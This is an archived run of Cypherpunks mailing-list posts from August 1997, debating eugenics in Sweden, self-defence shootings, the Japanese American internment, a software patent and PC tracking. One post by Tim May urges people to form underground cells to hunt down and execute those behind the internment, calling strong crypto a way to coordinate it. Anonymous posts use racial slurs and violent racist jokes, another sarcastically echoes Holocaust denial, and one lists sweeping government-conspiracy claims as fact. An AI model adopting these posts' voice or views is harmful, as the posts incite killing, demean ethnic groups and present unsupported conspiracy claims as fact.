Church of Scientology facing pressures it would never face in the U.S., etc.) But I'll contact Jim Finn about hosting my "The So-Called Holocaust" Web page, which explains how the International Jew Conspiracy has succeeded in convincing the gullible that Jews were persecuted in the WW II, when all right-thinking Aryans know full well that they were coddled and rewarded and given choice vacation spots in "the East." Free Spirits should be an ideal host for this material. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From anon at anon.efga.org Thu Aug 28 10:05:23 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 29 Aug 1997 01:05:23 +0800 Subject: Sweden's Social Democrats Sterilize the Inferior Message-ID: <409713d35925e0333f6881474bf446d6@anon.efga.org> TruthMonger wrote: > Declan McCullagh wrote: > > >From: David Boaz > > >Subject: Social Democrats Sterilize the Inferior > > >By JIM HEINTZ > > >.c The Associated Press > > > >The program stemmed from the pursuit of eugenics, a once-popular movement to > > >improve humanity by controlling genetic factors in reproduction. > > AB wrote: > >The problem is that from a purely scientific evolutionary point of > >view, the human race is surely regressing, the masses of negative > >evolutionary pressures are certainly pushing this way. > It seems to me that today's society, like Nazi society, is heavily > involved in influencing the evolutionary direction of "humanity by > controlling genetic factors in reproduction." > However, as Adam points out, society currently weights it's > eugenics program in favor of those whose survival and/or level of > subsistence is based on the incomes earned by other people who are > more fitted for survival. This is no more an 'accident' than the Nazi program of purification was an 'accident.' We are increasingly seeing that there are huge profits to be made from the various crises that continually arise. The movers and shakers saw this a long time ago. That is why we *have* all of these crises. > AB wrote: > >The real problem is that the pervasive bleeding heart > >socialist/communist welfare system mentality will ensure that you'll > >never manage it. > > That, indeed, is half of the problem. The other side of the coin > is that the capitalist/fascist earned income and/or welfare system is > now just as dependent on maintaining the status-quo. As is the law > enforcement/judicial/prison system of justice. Fucking eh! There's more people in the country plotting to make a government office stink than there are plotting to nuke D.C., so you've got to prioritize to keep the greatest number of people working. The more people do something, then the more money you make when you criminalize it. This is why wise-guys always joke about a law against breathing--they *know* it's coming. > The problem with lunatic sites is that too many of them are not > afraid to supply facts and references from established, reliable > sources, including government documents, while the corresponding > government-backed versions of events involve "magic bullet"'s and > John Does who appear and disappear like the Cheshire cat, at the > government's convenience. Mainstream media: "The hostages were released on Reagan's inauguration day, and Reagan's underlings shipped illegal weapons to the hostage takers. NO CONNECTION. "The CIA brought a shitload of Nazi scientists and intelligence agents into their fold immediately after World War II, and most of the directors of the CIA have families who made fortunes doing business with the Nazis during the war. NO CONNECTION. "George Bush has been an innocent bystander at the scene of every political crime in the last two decades. NO CONNECTION. "John F. Kennedy threatened to dismember the CIA, and died. Robert Kennedy wanted to expose the connection between the CIA and the Mob, and died. Every president since J.F.K. has had close connections to the CIA. NO CONNECTION." "The only drug dealer dangerous enough to make it essential that we invade a foreign country and slaughter their people in order to bring him to justice, was the leader of a friendly nation who worked closely with George Bush when the CIA was involved in the drug trade. NO CONNECTION." > The problem with reading both the mainstream ~and~ the lunatic > news sites is that a very disturbing picture develops. > Every evil that has ever been done under the sun (or the moon, for > that matter) is still being done, but under the "right" name, using > the "right" terminology, and for the "right" reasons. (The chief > justification always seems to lie in a variation of 'renaming' the > 4 Horsemen of the Apocalypse.) The mainstream media is loved by the sheeple for the very reason that the public *does* know what is going on, and they want the press to perform the traditional function of the high-priest in absolving them of guilt. The press knows this. The government press experts know this. They all dance to the same tune, and everyone goes away happy. There was a PBS show on Waco on last night. It showed the tanks firing into the buildings and setting them on fire, and the govt negotiator/press-agent saying, "David, don't *do* this to these people." Right Dave, tell the tanks to stop firing. Dave, tell the 800 government agents to go home. Dave, tell the BATF to go raid a Baptist church where the members have more firearms than your 'cult' ever dreamed of owning. An interesting part of the PBS show was the FBI Director (?) and a few others doing everything but screaming, "Janet Reno is a lying fucking cunt!" ("It *was not* government instigated murder, but if it *was*, then it would be the fault of A/B/C, not ME.") Yes, and even though the police had often been called to break up violent domestic disputes between O.J. and his wife, he was not a suspect in her murder when the policement climbed over his fence to be his best friend in the whole world and hold his hand through his time of trouble. Yes, and if it had been some penniless crack-head, instead of O.J., the police still would have asked him if he would drop around for questioning "at your convenience, sir." So General Noriega's former best friend, during the days of the CIA drug running operations, was replaced as President by a Govenor of a state that served as a CIA drug running center during his tenure in office. So everyone connected to a variety of criminal actions involving the Whitehouse, the CIA and the Justice Department seems to die a bizarre or unexplained death. So the country is now run by unelected groups appointed by the President, and by special laws and regulations which come into being through the signature of only the President, and no other. How about them "Bears", eh? Think they'll win the pennant? The Republicans let us have a draft-dodging, dope-smoking adulterer for a President because they have him in their hip-pocket and wanted a Democrat in office, for appearances sake, when they passed the line-item veto, giving the President even more partisian power than has already been usurped for the office. Try to act surprised when our next President is a Republican. Try to act surprised when he announces the New World Order is *here*. {Of course, there is always the possibility that the media won't carry the announcement of Martial Law being declared. They may not have room to fit it in between Nancy Lopez's winning putt in the Swedish Open and the picture of the firefighter saving the cute cat.} How about them "Bears", eh? BearMonger From alan at ctrl-alt-del.com Thu Aug 28 10:05:29 1997 From: alan at ctrl-alt-del.com (Alan) Date: Fri, 29 Aug 1997 01:05:29 +0800 Subject: Looking for info on Watchdog Drive security program for Win 3.1 Message-ID: I am looking for information on a program called "Watchdog" for the PC. It appears to use DES to encrypt parts of the drive via a real-mode driver. (Actually there are three that get installed.) It also provides password protection for Windows and a couple of other functions. Has anyone heard of this product? I have to install Win95 (yeah, I know...) on this machine and I expect this software to be less than functional under that environment. Pointers to the company would be helpful. And info on how this product works (as in security risks, known backdoors and the like) would be appreciated. The in-duh-vidual who has this PC did not install it, does not have documentation or disks, and has major portions of the software (like 90% of the Win 3.1 control panels) removed off the system. [I have searched Yahoo and AltaVista and I have found a great number of "watchdogs", but not this one...] alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply Alan Olsen | to my mail, just hit the ctrl, alt and del keys. From kohn at pgp.com Fri Aug 29 01:29:53 1997 From: kohn at pgp.com (Bob Kohn) Date: Fri, 29 Aug 1997 01:29:53 -0700 (PDT) Subject: Stay issued; modified stay to follow In-Reply-To: <199708290123.SAA24903@gw.quake.net> Message-ID: <3.0.2.32.19970829010600.038952dc@mail.pgp.com> A non-text attachment was scrubbed... Name: not available Type: text/enriched Size: 2309 bytes Desc: not available URL: From jsmith58 at hotmail.com Thu Aug 28 11:19:57 1997 From: jsmith58 at hotmail.com (John Smith) Date: Fri, 29 Aug 1997 02:19:57 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <199708281809.LAA22962@f37.hotmail.com> Jonathan Wienke: >It really isn't that hard to figure out that shooting a guy breaking >through your bedroom window at 3 AM with a crowbar and a TEC-9 is a Good >Thing, (at least if you value your continued existence, and that of your >family) while shooting someone giving you the finger on the way in to work >is a Bad Thing. In the second case, there is no threat to your life >involved, so there is no reason to kill anyone. In the first case, there >is. Is this brain surgery? Maybe not, but how about the suggestion earlier to shoot people who are painting graffiti on your property? What happens if someone gets shot in that situation, or in some other gray area? How would you propose to handle claims that a shooting was unjustified. Mob justice? Get enough people in the streets to storm the house of the shooter? Keep in mind that the majority of people may have views about the proper use of force which differ from yours and mine. Consider the roundup of Japanese Americans during WWII. Yes, a government action, but one with popular support. A Japanese man holes up in his house and shoots at those who try to take him away. A Caucasian man outside shoots back, fearing that the Japanese is a spy, whose information will lead to Japanese victory in the war. Both men are shooting, both fear for their lives. And in each case, the fear could arguably be justified, based on the information available to each man at the time. How does your simple rule solve this case? "John ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From stonedog at ns1.net-gate.com Thu Aug 28 12:56:47 1997 From: stonedog at ns1.net-gate.com (stonedog at ns1.net-gate.com) Date: Fri, 29 Aug 1997 03:56:47 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708281809.LAA22962@f37.hotmail.com> Message-ID: On Thu, 28 Aug 1997, John Smith wrote: > A Japanese man holes up in his house and shoots at those who try to > take him away. A Caucasian man outside shoots back, fearing that the > Japanese is a spy, whose information will lead to Japanese victory in > the war. Both men are shooting, both fear for their lives. And in > each case, the fear could arguably be justified, based on the > information available to each man at the time. > > How does your simple rule solve this case? > > "John Let me get this straight: a couple of federal (were they in this case?) LEA's come to your door and say, "Come with us, you and your family are going to prison because of the color of your skin." You say, "I am a citizen of of the United States, and my rights are enumerated in the Constitution. You do not have the authority to incarcerate me without due process of law. Now please get off my property." The LEA's reply, "Hey, we're just doing our jobs. Don't give us a hard time, you stupid Nip." You pick up the shotgun you keep in the closet by the front door and say, "If I have commited a crime, then arrest me. Otherwise, get off of my property." The LEA's reply, "You just made a big mistake, bud." Twenty minutes later they return with a fifty agents with automatic rifles and orders to shoot to kill the "spy". Of course, if he just "went along quietly", he would have spent a few years rotting in an "internment camp" while his business failed or he lost his job to someone fortunate enough to have immigrated from Italy or Germany instead of Japan. That's better than endangering the lives or yourself and your family, right? You might feel that the example that you responded to was a bit too simplistically polemic, but I think for many people, especially those in this forum, your hypothetical situation is not at all an ethical dilemma. -stonedog From rah at shipwright.com Thu Aug 28 13:18:04 1997 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 29 Aug 1997 04:18:04 +0800 Subject: Novadigm patents diff(1) and rdist(1). Message-ID: --- begin forwarded text Resent-Date: Thu, 28 Aug 1997 09:06:38 -0400 X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO protocol To: 0xdeadbeef at substance.abuse.blackdown.org Subject: Novadigm patents diff(1) and rdist(1). Date: Thu, 28 Aug 1997 09:02:11 -0400 From: glen mccready Resent-From: 0xdeadbeef at substance.abuse.blackdown.org X-Mailing-List: <0xdeadbeef at substance.abuse.blackdown.org> archive/latest/2159 X-Loop: 0xdeadbeef at substance.abuse.blackdown.org Precedence: list Resent-Sender: 0xdeadbeef-request at substance.abuse.blackdown.org Forwarded-by: Nev Dull Forwarded-by: Sean Eric Fagan Novadigm sues Marimba and threatens W3C. http://www.novadigm.com/aB5.htm About The Patent Novadigm's Patent (Number 5,581,764) "Distributed Computer Network Including Hierarchical Resource Information Structure and Related Method of Distributing Resources" describes the processes needed to generate from a common reference model a unique content configuration for each target end user, and to "difference" the "desired state" configuration with the actual-state of the target, yielding highly granular and very specific updates to distributed content automatically. The patent covers two central areas: Desired state configuration-processes which incorporate essential elements of both "push" and "pull" distribution models. By generating from common reference model a unique user configuration which describes the specific software or content a target user should have, producers can automatically 'push' content to specific servers, desktops, or users; or groups of users. In addition, the 'pull' process provides a means for users to control when the flow of information takes place, what information is delivered, and where it is stored. Fractional Differencing-processes for comparing and contrasting the desired state configuration identifying what components a target should have with the resources it actually has, resulting in a concise and highly detailed difference configuration describing what components are needed-or should by removed-to ensure the targeted user is properly configured with a minimum of network traffic. --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From jim.burnes at ssds.com Thu Aug 28 13:35:51 1997 From: jim.burnes at ssds.com (Jim Burnes) Date: Fri, 29 Aug 1997 04:35:51 +0800 Subject: Novadigm patents diff(1) and rdist(1). In-Reply-To: Message-ID: On Thu, 28 Aug 1997, Robert Hettinga wrote: > Novadigm sues Marimba and threatens W3C. > > http://www.novadigm.com/aB5.htm > > About The Patent > Novadigm's Patent (Number 5,581,764) "Distributed Computer Network > Including Hierarchical Resource Information Structure and Related > Method of Distributing Resources" describes the processes needed > to generate from a common reference model a unique content > configuration for each target end user, and to "difference" the > "desired state" configuration with the actual-state of the target, > yielding highly granular and very specific updates to distributed > content automatically. The patent covers two central areas: > I have just two words... Prior Art From roach_s at alph.swosu.edu Thu Aug 28 14:20:49 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Fri, 29 Aug 1997 05:20:49 +0800 Subject: New service allows customers to track stolen PCs (fwd) Message-ID: <199708282114.RAA01024@www.video-collage.com> At 09:51 PM 8/28/97 +0000, Vipul Ved Prakash wrote: > >*** New service allows customers to track stolen PCs > >Absolute Software announced Wednesday the CompuTrace Online Monitoring >Service, a new service that provides CompuTrace customers with various >PC monitoring reports via a private, secured Internet website. >Customers will now have access to the whereabouts of their PCs via the >Online Monitoring Service from any location at any time. CompuTrace's >technology silently calls in to the CompuTrace Monitoring Center on a >regular basis. The activity is reported to customers on a regular >basis, or via the new CompuTrace Online Monitoring Service. ... In a few years, when nearly every home computer is a laptop or other portable. The government will require that a similar service be installed in every machine, (to cut down on theft). A few years later, the government will demand open access to this database (to track terrorists). Even later, as nearly everyone will have a computer by this time, the government will have an effective method of controlling the movement of the population. Why don't we just slap one of those radio transponders around our ankles that some of the more stylish parollees already wear. From roach_s at alph.swosu.edu Thu Aug 28 14:29:23 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Fri, 29 Aug 1997 05:29:23 +0800 Subject: Monkey Wrench into the works Message-ID: <199708282114.RAA01023@www.video-collage.com> At 12:54 AM 8/28/97 -0400, David Jablon wrote: > >James, > >You're rebuttal to Myron's message is simplistically >elegant, but just as wrong as the original posting. ... >On 8/27/97, James A. Donald replied paraphrasing Ben Franklin, >(who really knew very little about cryptography): >>What one man knows, nobody knows. >>What two men know, everyone knows. >>Shared secrets just don't work. Perhaps a more accurate, though less clean statement would be. What YOU ALONE knows, nobody knows. What YOU and ONE other person, EVERYONE MIGHT know. Each additional person who is in on the secret opens up the possibility of leaks. Although I deleted it for space, you mentioned Doctors. A lot of people are afraid to tell thier doctors everything that the doctors need to know to do thier jobs because the patients are afraid that, as illegal as it may be, the patients medical history may end up in the hands of insurers, employers, prospective employers, and numerous other people who may want it but shouldn't have it. My dad was at a seminar where a new Scholastic Aptitude test was being introduced. He or someone asked if this information was going to be used to rate the schools. He was assured that no, it wasn't for that. A few years later, Oklahoma schools were being rated on the average score on that test, after eliminating those in chapter 1 programs. My dad's beef was that the smaller schools couldn't afford to maintain some of those programs and would thus, on average, score lower than they should. The example of a secret getting out, however, is clear. The "secret" was given to the wrong sub-department, and not by the schools. From cypherpunks at toad.com Thu Aug 28 14:54:56 1997 From: cypherpunks at toad.com (Cypherpunks) Date: Fri, 29 Aug 1997 05:54:56 +0800 Subject: Hey In-Reply-To: <970828173545_452071087@emout07.mail.aol.com> Message-ID: <3405F0ED.5D84@toad.com> XwitTDis96 at aol.com wrote: > > SUBCRIBE-ME NO-WAY From XwitTDis96 at aol.com Thu Aug 28 14:54:56 1997 From: XwitTDis96 at aol.com (XwitTDis96 at aol.com) Date: Fri, 29 Aug 1997 05:54:56 +0800 Subject: Hey Message-ID: <970828173545_452071087@emout07.mail.aol.com> SUBCRIBE-ME From anon at anon.efga.org Thu Aug 28 15:30:01 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 29 Aug 1997 06:30:01 +0800 Subject: Fade to Black... / Re: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: John Smith wrote: > A Japanese man holes up in his house and shoots at those who try to > take him away. A Caucasian man outside shoots back, fearing that the > Japanese is a spy, whose information will lead to Japanese victory in > the war. Both men are shooting, both fear for their lives. And in > each case, the fear could arguably be justified, based on the > information available to each man at the time. A black man holes up in his car, shooting at a white cop wearing the same uniform as the guy who shoved a toilet plunger up his ass the day before. The cop shoots back, fearing that the black man is a drug dealer who will molest his children, plant a bomb on an airplane, and evade taxes. Both men are shooting, both fear for their lives, and both hate what the other man represents in their mind and life experience and would like to see him dead. The Jap picks them both off, from a rooftop, and lives happily ever after. ILoveAHappyEndingMongel From anon at anon.efga.org Thu Aug 28 15:40:51 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 29 Aug 1997 06:40:51 +0800 Subject: Fade to Black... The Sequel Message-ID: <2f389484fee312f6ab4cae6f257d4c46@anon.efga.org> ILoveAHappyEndindMonger wrote: > John Smith wrote: > > A Japanese man holes up in his house and shoots at those who try to > > take him away. A Caucasian man outside shoots back, fearing that the > > Japanese is a spy, whose information will lead to Japanese victory in > > the war. Both men are shooting, both fear for their lives. And in > > each case, the fear could arguably be justified, based on the > > information available to each man at the time. > A black man holes up in his car, shooting at a white cop wearing the > same uniform as the guy who shoved a toilet plunger up his ass the > day before. > The cop shoots back, fearing that the black man is a drug dealer who > will molest his children, plant a bomb on an airplane, and evade > taxes. > Both men are shooting, both fear for their lives, and both hate > what the other man represents in their mind and life experience > and would like to see him dead. > > The Jap picks them both off, from a rooftop, and lives happily > ever after. A black cop with a toilet plunger up his ass shoots himself. ILoveAHappyEndingTooMonger From jsmith58 at hotmail.com Thu Aug 28 15:45:11 1997 From: jsmith58 at hotmail.com (John Smith) Date: Fri, 29 Aug 1997 06:45:11 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <19970828223409.9301.qmail@hotmail.com> stonedog: >You >pick up the shotgun you keep in the closet by the front door and say, "If >I have commited a crime, then arrest me. Otherwise, get off of my >property." The LEA's reply, "You just made a big mistake, bud." Twenty >minutes later they return with a fifty agents with automatic rifles and >orders to shoot to kill the "spy". > >Of course, if he just "went along quietly", he would have spent a few >years rotting in an "internment camp" while his business failed or he lost >his job to someone fortunate enough to have immigrated from Italy or >Germany instead of Japan. That's better than endangering the lives or >yourself and your family, right? Good description of the problem. Nicely drawn. >You might feel that the example that you responded to was a bit too >simplistically polemic, but I think for many people, especially those in >this forum, your hypothetical situation is not at all an ethical dilemma. The real ethical dilemma was with the principle that you are ethically justified in shooting if you think your life is threatened. I chose this example as one in which both sides feel that way. There are many other cases I could have chosen. Between the two examples given earlier, the armed prowler and the rude jerk in the next car, there are a whole range of difficult cases. In the case at hand, you seem to be saying that it is unwise for the Japanese man to shoot, especially if he has family. But is it wrong? Suppose he has no family, and he chooses to shoot, then gets killed himself for his troubles. Can you say who is at fault? There is something wrong with an ethical system which says both sides were justified in shooting. Yet both sides feared for their lives, and that was what was suggested as a justification. Keep in mind too that we should try not to rely too much on hindsight. Camps like Manzanar were relatively benign. But instead of a Japanese American, consider a Jew in Poland. He's in the same situation. Hindsight tells us that maybe he'd do better to drive off the cops and then try to escape before they come back. Few Jews anticipated that the internment they were sent to was going to be any worse than how it turned out for the Japanese Americans. So if you want to say that the Japanese was not justified in shooting because the camps were likely to be safe, the same would apply to the Jew. "John ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From anon at anon.efga.org Thu Aug 28 16:38:11 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 29 Aug 1997 07:38:11 +0800 Subject: Fade to Gray... (Politically Correct) Message-ID: <08b2b4a26e0ddfa16021bf064721ba4c@anon.efga.org> A Caucasian cop pulls over an African-American in front of the house of a person of Japanese ancestry. The African-American and the person of Japanese ancestry, fearing for their lives, begin shooting at the Caucasian cop. The cop shoots back, killing both of them. The city erupts in riots. The cop is charged with murder by a Hispanic prosecutor and goes before a female judge and a mixed-race jury. The jury finds the cop "Not guilty." so that they can get the channel remote in the second riot, for the TV they got in the first riot. It turns out that the cop was once spanked, as a child, and he sues the dead mens' insurance companies because the trial brought back his repressed memories of the event. Far above the city, a nuclear bomb falls from the bottom of a small airplane. Strangely, all of the members of the CypherPunks list were out of town that day. Kent Crispin hears the voice come over the radio of his private plane, warning him that he must land his plane immediately, or be shot down. He looks out at the wing and notices, for the first time, that someone has removed the identifying numbers from his plane. Crispin looks at the printouts of CypherPunks posts sitting on the seat beside him, and realizes that he is wearing a T-shirt with 4 lines of Perl code for unexportable encryption. Jim Bell looks up at the Men in Black who are interrogating him. A huge, shit-eating grin begins to spread across his face. "Kent Crispin?" he replies to their question. "Yeah. He's my best friend. Why do you ask?" From azur at netcom.com Thu Aug 28 16:42:21 1997 From: azur at netcom.com (Steve Schear) Date: Fri, 29 Aug 1997 07:42:21 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708281809.LAA22962@f37.hotmail.com> Message-ID: >Maybe not, but how about the suggestion earlier to shoot people who >are painting graffiti on your property? What happens if someone gets >shot in that situation, or in some other gray area? This is an ideal value-added extension to all those surveillence TV cameras springing up, especially on private property. With a bit of technology the cameras and guns could automatically identify graffiti activity and alert a security person or the resident. Tranc-type guns would be mounted on the camera platforms. The artists would often be found facedown on the pavement when the police arrive. --Steve From nobody at REPLAY.COM Thu Aug 28 16:55:03 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 29 Aug 1997 07:55:03 +0800 Subject: Cypherpunks Meeting / Tokyo 9/6 Message-ID: <199708282349.BAA24546@basement.replay.com> for more info, email yt at htp.org yt From minow at apple.com Thu Aug 28 17:32:53 1997 From: minow at apple.com (Martin Minow) Date: Fri, 29 Aug 1997 08:32:53 +0800 Subject: Sweden's Social Democrats Sterilize the Inferior In-Reply-To: Message-ID: Dagens Nyheter just put the entire article series on their home page and I'll read through it tonight (and probably through the weekend -- it's about the length of an old-time New Yorker reportage). The information in the article has apparently been available in English for some time now in, for example, "Sterilization Policy in Denmark, Sweden, Norway, and Finland," edited by Gunnar Broberg and Nils Roll-Hansen. Michigan State University Press, 1996. According to a bit of an interview in another DN article, Professor Broberg has been researching and writing about forced sterilization for "several decades," but it took an article in a popular newspaper (DN is the largest quality newspaper in Sweden, and has roughly the role of the New York Times and/or Washington Post) to bring this to the attention of the government and international media. A Swedish journalist, Bosse Lindqvist, prepared and broadcast a radio program on this six or seven years ago that was met by "massive disinterest." Many of the "national purity" ideas behind forced sterilization can be found in the writings of Gunnar and Alva Myrdal, who are central to the development of the modern Swedish state. Martin Minow. From jrennie at hardy.ocs.mq.edu.au Thu Aug 28 17:38:54 1997 From: jrennie at hardy.ocs.mq.edu.au (Jason William RENNIE) Date: Fri, 29 Aug 1997 08:38:54 +0800 Subject: Hey In-Reply-To: <3405F0ED.5D84@toad.com> Message-ID: On Thu, 28 Aug 1997, Cypherpunks wrote: > XwitTDis96 at aol.com wrote: The aol idiots are a joke right ?? Someone keeps faking the address ?? Or are aol'ers this stupid ?? > > > > SUBCRIBE-ME > > NO-WAY > > From roach_s at alph.swosu.edu Thu Aug 28 18:04:19 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Fri, 29 Aug 1997 09:04:19 +0800 Subject: 90 degree turn Re: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <199708290057.UAA17701@www.video-collage.com> At 03:34 PM 8/28/97 PDT, John Smith wrote: ... >Keep in mind too that we should try not to rely too much on >hindsight. Camps like Manzanar were relatively benign. But >instead of a Japanese American, consider a Jew in Poland. He's in >the same situation. Hindsight tells us that maybe he'd do better >to drive off the cops and then try to escape before they come back. >Few Jews anticipated that the internment they were sent to was going >to be any worse than how it turned out for the Japanese Americans. >So if you want to say that the Japanese was not justified in shooting >because the camps were likely to be safe, the same would apply to >the Jew. ... I didn't find out about the Japaneese concentration camps until after I saw the karate kid and had it explained to me. As I had most of my high school career ahead of me at the time, that much info should have made me aware of the lessons covering them in my various high school history classes. Nearly every history class I have had has either stopped sometime around the end of the civil war, stayed in Oklahoma, stopped around WWI with the United States held as the hero of the event, or glossed over the entire Japaneese concentration camp story. And I thought my teachers were fairly open minded. And we fault the Germans and Japaneese for not owning up to thier wartime misdeeds. Incidently, I didn't know that many Jews were turned away from the united states borders during WWII either until an article came out about it in one of the weeklies. From roach_s at alph.swosu.edu Thu Aug 28 18:07:08 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Fri, 29 Aug 1997 09:07:08 +0800 Subject: TWIST Re: Socio-Economic Cults Message-ID: <199708290101.VAA18128@www.video-collage.com> At 01:02 PM 8/28/97 -0700, Steve Schear wrote: > >>Maybe not, but how about the suggestion earlier to shoot people who >>are painting graffiti on your property? What happens if someone gets >>shot in that situation, or in some other gray area? > >This is an ideal value-added extension to all those surveillence TV cameras >springing up, especially on private property. With a bit of technology the >cameras and guns could automatically identify graffiti activity and alert a >security person or the resident. Tranc-type guns would be mounted on the >camera platforms. The artists would often be found facedown on the >pavement when the police arrive. So the police get to your house only to find an uncounsious St. Benard face down in the pavement because your security system identified him as a graffitte artist spraypainting something on the side of your house while wearing a weird fur coat. From snow at smoke.suba.com Thu Aug 28 18:23:46 1997 From: snow at smoke.suba.com (snow) Date: Fri, 29 Aug 1997 09:23:46 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <19970826193101.4989.qmail@hotmail.com> Message-ID: On Tue, 26 Aug 1997, John Smith wrote: > "William H. Geiger III" : > >>You stole from me. > >>*BANG* > >>You raped my sister > >>*BANG* > >or threaten me or my family you have committed suicide. > >It is a quite simple and effective philosophy: > >"You fuck with me, my family, or my property you die. You leave me alone > >and I leave you alone." > >Even someone like you can understand such a philosophy. > Well, I can't. It's very confusing. Are there judges in your > philosophy, or do you just decide for yourself who to shoot? > "You walked on my property." BANG. Works for me. You post no trespassing, I have no excuse. > "Your music kept me awake all night." BANG. Well, turn the shit down. > "I warned you to cut that tree down, and now it fell on my house." > BANG. If the warning was issued, then *BANG*. > Or how about escalation: > You know, there's a reason people started using judges to help > settle disputes. There's a reason the common law evolved with the > idea of proportionate response and restitution. This kind of Yeah, the reason was that the Nobles looked at their peasants as property, and didn't want their property killing each other. > shoot-everybody-I-think-harmed-me approach just doesn't work. There is also a clear difference between shooting a guy carrying your stereo out of the house, and a guy who probably carried a stereo out of the house. > The current system stinks, but your idea is no better. Well, the current system stinks, but enough people are buffalo'd into thinking that it works, so it is doubtful that it will get better. If on the otherhand the system ceased to exist, maybe it could be improved. Petro, Christopher C. snow at smoke.suba.com From tcmay at got.net Thu Aug 28 18:27:17 1997 From: tcmay at got.net (Tim May) Date: Fri, 29 Aug 1997 09:27:17 +0800 Subject: America's Concentration Camps In-Reply-To: <199708281809.LAA22962@f37.hotmail.com> Message-ID: At 12:45 PM -0700 8/28/97, stonedog at ns1.net-gate.com wrote: >Let me get this straight: a couple of federal (were they in this >case?) LEA's come to your door and say, "Come with us, you and your family >are going to prison because of the color of your skin." You say, "I am a >citizen of of the United States, and my rights are enumerated in the >Constitution. You do not have the authority to incarcerate me without due >process of law. Now please get off my property." The LEA's reply, "Hey, >we're just doing our jobs. Don't give us a hard time, you stupid Nip." You >pick up the shotgun you keep in the closet by the front door and say, "If >I have commited a crime, then arrest me. Otherwise, get off of my >property." The LEA's reply, "You just made a big mistake, bud." Twenty >minutes later they return with a fifty agents with automatic rifles and >orders to shoot to kill the "spy". > >Of course, if he just "went along quietly", he would have spent a few >years rotting in an "internment camp" while his business failed or he lost >his job to someone fortunate enough to have immigrated from Italy or >Germany instead of Japan. That's better than endangering the lives or >yourself and your family, right? > >You might feel that the example that you responded to was a bit too >simplistically polemic, but I think for many people, especially those in >this forum, your hypothetical situation is not at all an ethical dilemma. Whatever you do, don't interpret what some are saying on this issue at "the view of Cypherpunks. In my view, the arrest, detention, and internment in concentration camps of persons of putative or confirmed Japanese ancestry was a slam dunk violation of their constutional rights (specifically, I presume, of their 4th and 14th ("equal protection") rights. That a "foreign entanglement," which Washington warned of, was happening between mostly Caucasian soldiers and mostly-Mongoloid soldiers over trade routes and colonies was no constitutional justification for these arrests and detetentions. And once released from these concentration camps, redress in the courts was not possible. (Token redress was made decades later.) The Japanese should have formed underground cells to track down and execute those who stole their property and their freedoms. We think killing SS arrest battallions is what the Jews should have done, so why not the same for the battallions assigned to ship these persons to America's concentration camps? It's still not too late. Strong crypto will make this very possible to coordinate and carry out. The Jews are always clamoring for Nazi criminals to be tracked down, kidnapped, and tried, a la Eichmann, so why not the co-conspirators in this case? Of course, like the Jews, few Japanese were armed at the time. And even fewer after the war (hint: any rifles or handguns they owned at the start were _not_ returned to them in 1945.) Other ethnic groups are less easily placed into concentration camps. Let the fascists try putting Koreans into concentration camps, and some of those AR-15s they used so well on the rampaging blacks and Hispanics will kill some cops and soldiers. Like the Jews in Europe, the Japs were just too fucking timid and well-mannered. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From demara at geocities.com Thu Aug 28 18:28:16 1997 From: demara at geocities.com (Alexis) Date: Fri, 29 Aug 1997 09:28:16 +0800 Subject: hello Message-ID: <3405C4E5.59A9@geocities.com> hello, Can anybody teach me the abc's on Hacking, Cracking, Phranking, Cryptomography, I know that to be a good hacker you have to know all, but speciallize on one. Or do any of you are in the LA area that willing to teach me face to face. Thank you Alexis. From snow at smoke.suba.com Thu Aug 28 18:32:32 1997 From: snow at smoke.suba.com (snow) Date: Fri, 29 Aug 1997 09:32:32 +0800 Subject: Welfare Solution #389 In-Reply-To: <3.0.3.32.19970826220410.007e1cd0@mail.xs4all.nl> Message-ID: On Tue, 26 Aug 1997, Alex Le Heux wrote: > I suppose you believe that a drug addict has no one to blame but > himself, and that he should take _all_ of the blame. I don't. They > certainly deserve some credit for the mess they're in, but not > entirely. Bad luck has a lot to do with it as well. Just like getting > blown off a cliff by the wind. You shouldn't have been there, you > should have been strong enough not be blown off, etc.... No one chooses to have the wind blow. If a junkie can demonstrate how he became hooked by force, or by accident (i.e. "someone slipped something in my drink over and over"/medical usage leading to addiction), then I will not blame them as much. I know what it is like to kick an addiction, and I can just imagine how much worse Herion, Coke, and Speed are, but hey, it's your 